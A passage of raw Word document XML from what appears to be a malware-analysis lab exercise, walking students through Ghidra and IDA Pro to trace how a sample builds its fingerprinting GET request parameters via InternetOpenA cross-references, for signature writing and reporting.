          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="540"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc472375411"/>
      <w:bookmarkStart w:id="15" w:name="_Toc24514478"/>
      <w:r>
        <w:t>Reversing GET Request Parameter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidR="0018667E">
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="5DFEA77E" w14:textId="58006F40" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The purpose of a number of GET parameters can </w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t xml:space="preserve">often </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">be guessed </w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r>
        <w:t>or dynamically observed</w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">owever, as </w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">everse </w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>ngineers</w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F513D3">
        <w:t xml:space="preserve">you </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">need to be </w:t>
      </w:r>
      <w:r w:rsidR="00F513D3">
        <w:t xml:space="preserve">able to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">distinguish </w:t>
      </w:r>
      <w:r w:rsidR="00F513D3">
        <w:t xml:space="preserve">the source of these parameters </w:t>
      </w:r>
      <w:r>
        <w:t>for signature writing and reporting purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6C6A23" w14:textId="09AC58EB" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disassemble the sample in </w:t>
      </w:r>
      <w:r w:rsidR="002E0A4F">
        <w:t>Ghidra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="002E0A4F">
        <w:t>locate the Imports information for this binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133080A2" w14:textId="2F789F4B" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>This sample is not packed</w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n order to identify which code sections are emitting </w:t>
      </w:r>
      <w:r w:rsidRPr="009E7A35">
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> requests</w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> use cross-references to common imports.</w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t xml:space="preserve"> One of these imports is </w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>InternetOpenA</w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DD461E" w14:textId="53285CAC" w:rsidR="009E7A35" w:rsidRDefault="009E7A35" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:t xml:space="preserve">avigate to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>InternetOpenA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B2745">
        <w:t xml:space="preserve">and press CTRL + F or right click and select references </w:t>
      </w:r>
      <w:r w:rsidRPr="009E7A35">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C37801" w14:textId="60D7D559" w:rsidR="005927A0" w:rsidRDefault="009E7A35" w:rsidP="00522042">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C7BA838" wp14:editId="5EF14CDA">
            <wp:extent cx="5122545" cy="556895"/>
            <wp:effectExtent l="0" t="0" r="1905"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 Shot 2016-12-31 at 2.09.28 PM.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22545" cy="556895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DF9E32" w14:textId="7A8FDCD4" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>: View Import References of InternetOpenA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C4CA37" w14:textId="3D44D3CA" w:rsidR="005927A0" w:rsidRPr="00522042" w:rsidRDefault="009E7A35" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IDA Pro,</w:t>
      </w:r>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2016. </w:t>
      </w:r>
      <w:r w:rsidR="00522042" w:rsidRPr="00522042">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reproduced and used in accordance with the fair dealing provisions in section 29 of the Canadian Copyright Act for the purposes of education, research or private study. Further distribution may infringe copyright.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8E88F4" w14:textId="039A9D29" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> navigate to the second referenced address </w:t>
      </w:r>
      <w:r w:rsidRPr="003F11A2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sub_404400+387</w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> see a string reference to the found user agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1328E4D7" w14:textId="6CD716C0" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Navigat</w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to lower addresses </w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> see string references that correspond</w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t xml:space="preserve"> to the fingerprint GET request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A12E287" w14:textId="77777777" w:rsidR="009D478D" w:rsidRDefault="009E7A35" w:rsidP="00522042">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AB00609" wp14:editId="239443D3">
            <wp:extent cx="5088160" cy="55398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 Shot 2016-12-31 at 2.26.18 PM.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86933" cy="564734"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6EF5A8" w14:textId="618917F4" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="002A1460">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009E7A35">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="004359D6">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="009E7A35">
        <w:t>: Idle GET Parameter String Reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D331AF" w14:textId="0662E6D5" w:rsidR="005927A0" w:rsidRPr="00522042" w:rsidRDefault="009E7A35" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IDA Pro,</w:t>
      </w:r>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2016. </w:t>
      </w:r>
      <w:r w:rsidR="00522042" w:rsidRPr="00522042">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reproduced and used in accordance with the fair dealing provisions in section 29 of the Canadian Copyright Act for the purposes of education, research or private study. Further distribution may infringe copyright.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E25BF99" w14:textId="77777777" w:rsidR="005927A0" w:rsidRPr="00522042" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29340CD4" w14:textId="08533D68" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Two </w:t>
      </w:r>
      <w:r w:rsidRPr="009E7A35">
        <w:t>functions</w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>sub_406A20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>sub_403B90</w:t>
      </w:r>
      <w:r w:rsidR="009E7A35">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> perform string operations on the GET request to be made. The first appends a dynamic value (resolved in earlier functions), and the second appends a fixed string value. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDCECFE" w14:textId="49B87BF2" w:rsidR="005927A0" w:rsidRDefault="009E7A35" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>o reverse engineer the dynamically resolved values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> check </w:t>
      </w:r>
      <w:r w:rsidR="004359D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cross-reference </w:t>
      </w:r>
      <w:r w:rsidR="004359D6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">the parameters being supplied to </w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>sub_406A20</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>EAX</w:t>
      </w:r>
      <w:r w:rsidR="005927A0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8028FF" w14:textId="77777777" w:rsidR="004359D6" w:rsidRDefault="004359D6" w:rsidP="00522042">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="312AA54A" wp14:editId="2ED06A06">
            <wp:extent cx="3410712" cy="1188720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60" name="officeArt object"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1073741839" name="Screen Shot 2017-01-01 at 1.34.42 PM.p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10712" cy="1188720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA65F99" w14:textId="55E18680" w:rsidR="005927A0" w:rsidRPr="004359D6" w:rsidRDefault="005927A0" w:rsidP="002A1460">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004359D6">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="004359D6" w:rsidRPr="004359D6">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="004359D6">
        <w:t>: Idle GET Parameter String Reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34355C19" w14:textId="3940CCF7" w:rsidR="004359D6" w:rsidRPr="00522042" w:rsidRDefault="004359D6" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IDA Pro,</w:t>
      </w:r>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2016. </w:t>
      </w:r>
      <w:r w:rsidR="00522042" w:rsidRPr="00522042">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reproduced and used in accordance with the fair dealing provisions in section 29 of the Canadian Copyright Act for the purposes of education, research or private study. Further distribution may infringe copyright.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AE3F8E" w14:textId="0B30D51C" w:rsidR="005927A0" w:rsidRPr="00522042" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1245A8" w14:textId="79FE8248" w:rsidR="004359D6" w:rsidRPr="00AC33B9" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Navigat</w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to the first address shown where the value of the local stack variable is being set to the value of </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>EAX</w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Note the</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> function call above this line</w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> can assume returns the value that is assigned</w:t>
      </w:r>
      <w:r w:rsidR="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5050BD86" w14:textId="7A0703C9" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E1AFBED" wp14:editId="424EAE80">
            <wp:extent cx="3171559" cy="342872"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>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 Shot 2017-01-01 at 2.47.51 PM.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35395" cy="349773"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AB3665" w14:textId="78CE5D9B" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="004359D6">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Function Call </w:t>
      </w:r>
      <w:r w:rsidR="00E409A4">
        <w:t xml:space="preserve">above </w:t>
      </w:r>
      <w:r>
        <w:t>Parameter Value Assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F583832" w14:textId="24761C10" w:rsidR="004359D6" w:rsidRDefault="004359D6" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IDA Pro,</w:t>
      </w:r>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2016. </w:t>
      </w:r>
      <w:r w:rsidR="00522042" w:rsidRPr="00522042">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reproduced and used in accordance with the fair dealing provisions in section 29 of the Canadian Copyright Act for the purposes of education, research or private study. Further distribution may infringe copyright.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6752AA6A" w14:textId="4161CFE6" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="005927A0">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B6019F" w14:textId="77777777" w:rsidR="00AC33B9" w:rsidRDefault="00AC33B9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:bdr w:val="nil"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F31DD60" w14:textId="7C676EA8" w:rsidR="00AC33B9" w:rsidRDefault="005927A0" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC33B9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A DWORD is referenced in this function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3790DA59" w14:textId="2D72A8DD" w:rsidR="005927A0" w:rsidRPr="00AC33B9" w:rsidRDefault="00AC33B9" w:rsidP="009D4C43">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D06E673" wp14:editId="7CC385F1">
            <wp:extent cx="4954138" cy="184515"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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creen Shot 2017-01-01 at 8.18.26 PM.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7093658" cy="264201"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
